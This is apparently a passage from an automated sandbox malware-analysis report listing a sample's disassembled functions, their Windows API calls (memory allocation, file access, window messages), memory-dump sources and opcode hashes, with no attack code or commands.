                                                                                                                                    • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                    • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                                                    • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                    • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                    Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                    • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                    • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                    • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                    Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                    • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                    • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                    • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                    Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                    • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                                                    • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                    • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                                                    Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                    • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                                                    • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                    • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                                                    Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                    • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                                                    • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                    • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                                                    Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                    • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                                                    • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                    • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                                                    Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                    • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3394109436-0
                                                                                                                                    • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                    • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                                                    • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                    • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                                                    Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                    • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                                                    • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                    • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                                                    Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                    • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                    • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                                                                                    • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                                                                                    • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                                                                                    Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                    • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                                                                                    • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                                                                                    • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                                                                                    Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                    • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                                                                                    • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                                                                                    • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                                                                                    Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                    • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4115351271-0
                                                                                                                                    • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                    • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                                                    • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                                                    • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                                                    Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                    • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                                                    • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                                                    • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                                                    Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                    • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                    • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                                                    • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                                                    • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                                                    Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
